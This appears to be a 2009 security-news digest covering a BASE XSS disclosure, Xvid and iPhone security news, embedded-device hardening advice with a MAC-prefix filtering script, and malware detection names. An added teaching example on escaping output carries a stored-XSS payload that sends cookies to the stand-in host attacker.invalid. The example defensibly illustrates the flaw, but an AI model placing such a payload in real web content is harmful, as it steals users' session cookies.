May, 2009:

BASE – 3 Persistent Cross Site Scripting Vulnerabilities

Posted by Jabra on May 30

BASE, a well known Snort Frontend has 3 Persistent Cross Site Scripting
Vulnerabilities.

For those who don’t know, Cross-Site Scripting allows the attacker to inject
JavaScript to modify the functionality of the webpages. Since this
vulnerability exists in BASE, this allows an attacker to…

URL: http://seclists.org/fulldisclosure/2009/May/0278.html
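The post is cut off before it says which BASE pages carry the flaw, so the following is only an illustration of the persistent (stored) XSS pattern it describes: a web console that takes a field recorded from network traffic and interpolates it into HTML without encoding. It is an added example, not code from BASE or from Jabra’s post; the record layout (`host`, `payload`), the page name `alerts.php` and the rendering functions are assumptions.

```python
import html
from urllib.parse import quote

# Constructed alert record for this example. In a Snort frontend, any field
# that originates from captured traffic (an HTTP Host header, a URI, packet
# payload bytes, ...) was chosen by whoever sent the packet, so once it is
# stored and rendered it is attacker-controlled input to the analyst's browser.
ALERT = {
    "sid": 1000001,
    "host": '" onmouseover="alert(document.cookie)',
    "payload": "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>",
}


def render_alert_unsafe(alert: dict) -> str:
    """Vulnerable pattern: raw interpolation into an attribute and a text node."""
    return (
        f'<tr><td><a href="alerts.php?host={alert["host"]}">{alert["host"]}</a></td>'
        f'<td>{alert["payload"]}</td></tr>'
    )


def esc(value) -> str:
    """HTML-escape for text nodes and double-quoted attribute values."""
    return html.escape(str(value), quote=True)


def render_alert_safe(alert: dict) -> str:
    """Hardened form: every value is encoded for the context it lands in.

    The query-string component is percent-encoded, the visible text and the
    attribute value are HTML-escaped. Encoding at output time is what makes
    stored data safe regardless of how it got into the database.
    """
    host_param = quote(str(alert["host"]), safe="")
    return (
        f'<tr><td><a href="alerts.php?host={host_param}">{esc(alert["host"])}</a></td>'
        f'<td>{esc(alert["payload"])}</td></tr>'
    )


def breaks_out(markup: str) -> bool:
    """Crude check: did untrusted data introduce a new tag or event-handler attribute?"""
    lowered = markup.lower()
    return "<script" in lowered or ' onmouseover="' in lowered


if __name__ == "__main__":
    print("unsafe:", render_alert_unsafe(ALERT))
    print("safe:  ", render_alert_safe(ALERT))
```

The `breaks_out` check is only a sanity test for this example, not a detection method; the real control is the context-aware encoding in `render_alert_safe`, which is what a fix for a stored XSS in any web frontend comes down to.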

Sprint’s CEO Rakes in $15.5M in Compensation

Dan Hesse, CEO at Sprint-Nextel Corp. took home 30 percent bigger of a bonus for 2008 than expected, raking in $2.6 million. His overall compensation package came in at $15.5 million, with a base salary of $1.2 million.

Sprint shares have lost more than 70 percent of their value since the beginning of 2008.

It also lost 4.6 million customers during 2008, losing $2.8 billion, but Sprint spokesman James Fisher told the Wall Street Journal that the carrier has actually shown improvement, including cutting $1 billion in costs and renegotiating its credit position, a position with which many analysts agree.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31544

Yet another company decides to get into the Mac cloning game

Psystar has had a rather lackluster showing in its attempt to sell unauthorized Mac clones: besides Apple suing the pants off the company, Psystar has also filed for bankruptcy after just a year in existence. Now, a new company in Los Angeles hopes to somehow escape the wrath of Apple Legal by, get this, opening a brick and mortar retail store. Quo Computer is set to open for business next Monday, June 1.

“It’s exciting. We are trying to stay as close to Apple as we can with our products,” Rashantha De Silva, Quo founder, told CNET. “We are trying to mimic things as much as we can. I’m hoping that Apple sees the value in what we are doing.”

Here in Orbiting HQ, we’re approximately 100 percent certain Apple will not see the value in a company that has the stated purpose of mimicking Apple’s hardware as closely as possible. There’s a word for trying to duplicate another company’s products as closely as possible and then trying to sell them: rip-off.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31543

Security update for Xvid

The Xvid developers have released version 1.2.2 of their MPEG-4 codec to fix three security-related issues. One of the flaws reportedly prevents a function of the xvidcore library from checking the resync marker range correctly.

In its short announcement, Xvid Solutions does not mention whether the flaws can be exploited for injecting code via specially crafted videos. However, the developers highly recommend that users update. The update also offers various minor improvements, for example more precision for RGB-to-YUV colour conversions.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31542

CIS releases security configuration standards for iPhone

The nonprofit Center for Internet Security (CIS) this week released free guidelines that can help organizations develop custom policies related to use of the increasingly popular mobile device, said Blake Frantz, CTO of the CIS. The benchmarks inform users about the security configuration settings available to them on the iPhone. For example, the standards explain how to make adjustments to protect data and deter potential attacks, such as disabling Bluetooth or JavaScript, or creating a strong password policy.

Frantz told SCMagazineUS.com on Friday that feedback from the CIS’ 150 members showed that there was a need for iPhone security standards. “It’s going to have your organization’s confidential information on it,” he said. “We want to equip organizations with some best practices so that that information remains confidential.”

The guidance arrives at a time when businesses are facing increased pressure to manage their employees’ smartphones. A recent Osterman Research study, sponsored by Zenprise, a provider of mobile management solutions, reported that the percentage of North American workers issued mobile devices by their employers will double from 23 percent last year to 46 percent in 2011. Other studies have said the number of iPhones in use in the enterprise will triple between now and 2011.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31541

New Travel Rules for High-Tech IDs Take Effect June 1

New travel requirements go into effect June 1 at U.S. land and sea borders amid security concerns over an RFID-enabled passport card that has been approved for U.S. travelers.

The passport cards are being issued by the U.S. State Department under a program aimed at better securing U.S. borders against terrorist threats. Under the program, called the Western Hemisphere Travel Initiative (WHTI), U.S. citizens returning from Canada, Mexico, Bermuda, and the Caribbean by land or sea will be required to show a valid passport, the RFID-enabled passport or a WHTI-compliant driver’s license starting June 1. Currently, U.S. citizens can re-enter the country from these four regions with a driver’s license and proof of citizenship, such as a birth or naturalization certificate.

The passport cards, about 1 million of which have been issued so far, are designed to be a secure but cheaper alternative to regular passports. The card costs $45 for those 16 and older and $35 for those under 16. In contrast, a regular passport costs $100 for those over 16 and $85 for minors.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31540

The 5-step guide to fixing almost any PC problem

Troubleshooting is a curious skill. It’s part detective work, part methodical experimentation, part inspired guesswork, and part Zen Buddhism. That’s a lot of parts, but you need them all to be able to sift through a list of symptoms, identify the fault, work out an appropriate remedy and not go barking mad in the process.

Knowing how computers work is also handy, but it isn’t enough by itself and it’s much less important than you may think, now that all human knowledge is just a Google search away. Knowing the answers is all very well but the real art is asking the right questions. See what I mean about the Zen?

So I’m not going to give you a fish. I’m not even going to teach you how to fish. I’m going to build you a stinking trawler. Theoretically this ought to put me out of a job but in practice, the well of human stupidity seems to replenish itself far faster than I can pump it out, so there’s no need to worry on my behalf.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31539

‘Pay With Facebook’ Is In The Wild

Earlier today, we wrote about Facebook updating its terms to get ready for the roll-out of its payment system. Well, guess what: it’s already here.

The application GroupCard is currently testing the new payment system live for all accounts that have it installed. I included some screenshots below. It’s very straightforward: there’s a big “Pay With Facebook” button, similar to the Facebook Connect buttons you see throughout the web. Next to that, there are the other options to pay with Visa, Mastercard, etc.

Clicking on the Pay With Facebook button pops open an overlay which asks you to confirm payment via your Facebook Credits. My $2.99 card cost me 30 Facebook Credits. Expect to see this roll out to other applications soon.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31538

Why Karma Matters

Microsoft Silverlight vs Google Wave: Why Karma Matters

Inevitable comparisons are made between the hugely enthusiastic developer response (including from us at Zoho) to Google Wave yesterday and the relatively tepid response to Microsoft’s new search engine Bing. The really interesting contrast to us, as independent software developers, is the way developers responded to Silverlight as opposed to the reaction yesterday to Google Wave. Both Silverlight and Wave are aimed at taking the internet experience to the next level. To be perfectly honest, Silverlight is a great piece of technology. Google Wave, as yet, is not much more than a concept and an announcement.

It is easy to dismiss all this with “Oh, the press just loves to hype everything Google, and loves to hate Microsoft,” but that cannot explain why even competitors like us are willing to embrace Google’s innovations yet stay away from perfectly good innovations from Microsoft, such as Silverlight.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31537

Electronic messages never really private

Cell phones, instant messages and global positioning satellites are everywhere. But awareness that information sent over these devices is traceable doesn’t seem to be.

“I think people, in their lazy behavior, think they’re communicating one on one,” said John Donovan, a technology expert whose company, Telecom Visions Inc., is based in Garden City. “But there’s no real guarantee of privacy.”

And these devices can be instruments of undoing for those who run afoul of the law. That’s the case for Melissa Weber, 27, a teacher in Queens who was arraigned Friday on statutory rape charges stemming from her alleged sexual relationship with one of her 14-year-old students.

URL: http://www.hackinthebox.org/index.php?name=News&file=article&sid=31536

Embedded Devices: An Avenue for Cyberterrorism? (Sat, May 30th)

There has been growing concern with the security of embedded devices as they continue to proliferate in several industries. This is caused by a confluence of several issues that makes for a difficult problem to solve.

First, these devices more and more rely on commodity operating systems (which carry with them commodity vulnerabilities and exploits). Second, there is a great deal of restriction on what consumers of these devices can do with them. Very often, you simply can’t touch the operating system at all. Last, these devices tend to be notoriously difficult to update, usually requiring the vendor to come out with a CD to reflash the device. Updates are few and far between, if updates are put in place at all.

The upshot is that such a device is subject to a good subset of the same vulnerabilities as any workstation, yet it is very difficult to put it in the same patch rotation, much less maintain and harden it. Ideally, these devices shouldn’t be plugged into a network, but often they are. For instance, many embedded devices for SCADA and healthcare have reportedly been infected by Conficker (among others).

In those cases, they just got infected with commodity malware and behaved like your typical infected host. The scary part is that these devices can control very important things. Years ago, I would chafe at anyone using the word cyberterrorism. Terrorism has a specific definition that is a bit more restrictive than “something bad”. It’s not terrorism unless widespread, debilitating fear is involved.

However, now with embedded devices in hospitals, you have devices vulnerable to commodity exploits, and the payload can be modified to do something bad with that device’s functionality. In health care, for instance, if the device controls some life-saving or life-sustaining function, malware could have it intentionally cause harm. That would be an example of cyberterrorism. People would very quickly develop a fear of health care. So what can we do about it?

The real solution is that embedded device manufacturers need to provide updateability to these devices and ship them hardened. Barring that, here are some tips to help protect facilities that use these devices.

1) If they don’t need to be on a network, take a Cat5 cable, cut off the RJ45 connector with about an inch of cable and plug that into the port. Not only does this fill the gap, it makes people think twice before just plugging it in. Hang a note off the cable, if necessary.

2) If these devices have a unique vendor for the network card, use network access control to simply block all the MAC addresses for that vendor. For instance, in the MAC address AA:AA:AA:22:22:22 the vendor portion (the OUI) is AA:AA:AA and the unique host portion is 22:22:22. So block AA:AA:AA:*.

3) If they absolutely must be networked, create an islanded network. In short, a network with no external-facing components: a totally isolated LAN.

4) Limit all access to the device via network, via USB or via Bluetooth. All these can be used as infection mechanisms.
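The vendor-prefix block in tip 2 is the one of these that reduces to code, so here it is worked through: normalise whatever MAC format the switch, DHCP server or inventory hands you, extract the OUI, decide block/allow, and emit the corresponding bridge-firewall rule. This is an added example written for this page, not code from the diary or from any NAC product. The lease lines are constructed, the OUI AA:AA:AA is the diary’s own illustrative prefix rather than a real vendor assignment, and the generated rule assumes ebtables’ `address/mask` source-MAC syntax is the enforcement point.

```python
import re

# Vendor prefix from the diary's own example. In practice this set is filled
# from the device vendor's IEEE OUI registration(s), which may be several.
BLOCKED_OUIS = {"AA:AA:AA"}

# Constructed DHCP-lease-style lines for this example: "<ip> <mac> <hostname>".
# The MACs deliberately use three different notations.
LEASES = """\
10.0.5.11 aa:aa:aa:22:22:22 infusion-pump-03
10.0.5.12 AA-AA-AA-00-1F-07 imaging-console
10.0.5.20 001b.214c.9eaa workstation-07
"""


def normalize_mac(mac: str) -> str:
    """Canonicalise colon, dash, Cisco dotted and bare-hex forms to AA:BB:CC:DD:EE:FF."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(digits) != 12:
        raise ValueError(f"not a 48-bit MAC address: {mac!r}")
    return ":".join(digits[i:i + 2] for i in range(0, 12, 2))


def oui(mac: str) -> str:
    """Vendor portion: the first three octets (the IEEE OUI)."""
    return normalize_mac(mac)[:8]


def is_locally_administered(mac: str) -> bool:
    """Bit 0x02 of the first octet set means the address was assigned in software,
    not burned in by the vendor. Such addresses carry no vendor information, and a
    spoofed address is indistinguishable from a genuine one on the wire, which is
    why OUI filtering is an accident-prevention measure, not a security boundary."""
    return bool(int(normalize_mac(mac)[:2], 16) & 0x02)


def should_block(mac: str, blocked=BLOCKED_OUIS) -> bool:
    return oui(mac) in blocked


def ebtables_rule(prefix: str) -> str:
    """Drop every frame whose source MAC falls under the OUI (assumed ebtables mask syntax)."""
    base = normalize_mac(prefix + ":00:00:00")
    return f"ebtables -A FORWARD -s {base}/FF:FF:FF:00:00:00 -j DROP"


def audit_leases(text: str):
    """Return (ip, canonical mac, hostname, blocked?) for each non-empty lease line."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ip, mac, hostname = line.split()
        rows.append((ip, normalize_mac(mac), hostname, should_block(mac)))
    return rows


if __name__ == "__main__":
    for ip, mac, host, blocked in audit_leases(LEASES):
        print(f"{ip:<12} {mac} {host:<18} {'BLOCK' if blocked else 'allow'}")
    for prefix in sorted(BLOCKED_OUIS):
        print(ebtables_rule(prefix))
```

Two practical notes. First, normalisation matters more than it looks: an access-control list that compares `aa-aa-aa-22-22-22` against `AA:AA:AA:22:22:22` as strings silently fails open. Second, the locally-administered check is there because the filter only means anything for burned-in addresses; as it happens, the diary’s example prefix AA:AA:AA has that bit set, so no vendor would ship it, which is fine for an illustration but worth knowing when you build a real list.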

What are your thoughts? Those of you using embedded devices or vendor black boxes, how are you securing them?

Cinema ordered to pay $10K in damages for search

Ca: Cinema ordered to pay $10K in damages for search

A Quebec court has ordered a cinema to pay $10,000 in damages after staff searched patrons’ bags and turned up smuggled snacks and birth control pills — and in the process violated their privacy rights.

Source – CTV.ca

via BoingBoing


URL: http://www.pogowasright.org/article.php?story=20090530190741593

4117

PDF/Exploit.Pidief.ONG, VBS/TrojanDownloader.Small.L (6), Win32/Adware.BHO.GBP (2), Win32/Adware.BHO.NCG (2), Win32/Adware.GooochiBiz (4), Win32/Adware.WSearch, Win32/Agent.NXT (2), Win32/AutoRun.Agent.NP, Win32/AutoRun.Delf.BY, Win32/Delf.PFS, Win32/FlyStudio.NML, Win32/FlyStudio.NMM (5), Win32/Hupigon, Win32/Hupigon.NPE, Win32/KillAV.NDV (2), Win32/Koutodoor.AF (3), Win32/Koutodoor.G, Win32/Peerfrag.AG, Win32/Poison.NBC (2), Win32/PSW.Agent.NLP (2), Win32/PSW.OnLineGames.NMP (2), Win32/PSW.OnLineGames.NMY (3), Win32/PSW.OnLineGames.NNM, Win32/PSW.OnLineGames.NSU (2), Win32/PSW.OnLineGames.OKE, Win32/PSW.WOW.DZI, Win32/PSWTool.MailPassView.151 (4), Win32/Rootkit.Agent.NLY, Win32/Rustock.NIH, Win32/Rustock.NIK (3), Win32/Spy.Banker.AFFJ, Win32/Spy.Banker.QLG (4), Win32/TrojanDownloader.Bredolab.AA (2), Win32/TrojanDownloader.FakeAlert.AAX, Win32/TrojanDownloader.FakeAlert.ABV, Win32/TrojanDownloader.FakeAlert.ACU, Win32/TrojanDownloader.FakeAlert.ACV (2), Win32/TrojanDownloader.Zlob.CZJ, Win32/TrojanDropperDelf.NNM (2), Win32/TrojanDropper.VB.NHZ (2), Win32/Wigon.KU (2), Win32/Wigon.KY

URL: http://www.eset.com/joomla/index.php?option=com_content&task=view&id=6089&Itemid=26

Obama Says Government Sanctions Unwarranted in Spy Case

The Obama administration refused to budge late Friday and agree to reveal state secrets in a lawsuit weighing whether a sitting president may lawfully bypass Congress and spy on Americans without warrants as President George W. Bush did following the 2001 terror attacks.

In court briefs (pdf) filed at nearly midnight White House time, the Justice Department was responding to a federal judge’s week-old inquiry on whether the administration should be sanctioned for “failing to obey the court’s orders” in a key National Security Agency lawsuit. The government, as it has repeatedly, urged U.S. District Judge Vaughn Walker to allow the government to appeal his January 5 order requiring the government to develop a plan – a so-called “protective order” – that would pave the way to the release of state secrets to plaintiffs’ attorneys.

Source – Threat Level


URL: http://www.pogowasright.org/article.php?story=20090530060930717

Is FFSpy a hoax?

Posted by FFSpy Buster on May 30

Hi,

I have been watching the discussion on FFSpy for the last few weeks.
Duarte Silva, the author, first posted it here: http://myf00.net/?p=18

He also believes that the addon mechanism of all software is flawed from a
security standpoint. He says that while it is not much of a nuisance in

URL: http://seclists.org/fulldisclosure/2009/May/0271.html